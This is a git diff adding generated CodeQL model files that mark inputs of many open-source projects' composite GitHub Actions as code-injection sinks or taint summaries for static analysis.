diff --git a/actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml new file mode 100644 index 000000000000..131b59e4f426 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml new file mode 100644 index 000000000000..2b6604f4bce7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml new file mode 100644 index 000000000000..028fac59db90 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml new file mode 100644 index 000000000000..e188c7fb160c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml new file mode 100644 index 000000000000..fe09708380b4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.local-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml new file mode 100644 index 000000000000..430d128f1a00 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml new file mode 100644 index 000000000000..ecfd41e15dc8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml new file mode 100644 index 000000000000..b334b14eb37d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml new file mode 100644 index 000000000000..936a44a214ba --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml new file mode 100644 index 000000000000..c116f45a7dfe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml new file mode 100644 index 000000000000..f8438e902c6e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml new file mode 100644 index 000000000000..dc392c76263d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml new file mode 100644 index 000000000000..0e7876a64fe4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml new file mode 100644 index 000000000000..ccad63033af8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml new file mode 100644 index 000000000000..138ced8ab043 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml new file mode 100644 index 000000000000..20493280565c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.local-branch", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml new file mode 100644 index 000000000000..a0d3adcc3d2b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml new file mode 100644 index 000000000000..7db33e6e72c3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml new file mode 100644 index 000000000000..c4fca4427eca --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml new file mode 100644 index 000000000000..09d2beb89470 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml new file mode 100644 index 000000000000..bd5de74fa09d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml new file mode 100644 index 000000000000..5b46de73fc27 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml new file mode 100644 index 000000000000..970fd7bc1f13 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml new file mode 100644 index 000000000000..af46895fa51f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml new file mode 100644 index 000000000000..98ef93128eb3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml new file mode 100644 index 000000000000..8d4820efeb70 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml new file mode 100644 index 000000000000..44f0c6dce8f8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml new file mode 100644 index 000000000000..d874137e497a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml new file mode 100644 index 000000000000..2ec8442b1cf7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml new file mode 100644 index 000000000000..046bb764a1d6 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml new file mode 100644 index 000000000000..dcd8a2df02c0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml new file mode 100644 index 000000000000..238d675e5b7f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml new file mode 100644 index 000000000000..c6f83e458bde --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml new file mode 100644 index 000000000000..8a10734bd645 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml new file mode 100644 index 000000000000..770554c8b9df --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml new file mode 100644 index 000000000000..fb0631e0bbbb --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml new file mode 100644 index 000000000000..caf896bbac3d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml new file mode 100644 index 000000000000..02917d6da30e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml new file mode 100644 index 000000000000..17bea3155c5a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml new file mode 100644 index 000000000000..64ff68f38ad1 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.build-folder-name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml new file mode 100644 index 000000000000..c6bdede140fd --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] + - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml new file mode 100644 index 000000000000..7909d6177768 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml new file mode 100644 index 000000000000..c62ee58c4402 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml new file mode 100644 index 000000000000..37efd3a4d40b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml new file mode 100644 index 000000000000..0a84e79d0243 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] + - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml new file mode 100644 index 000000000000..a026f0529340 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml 
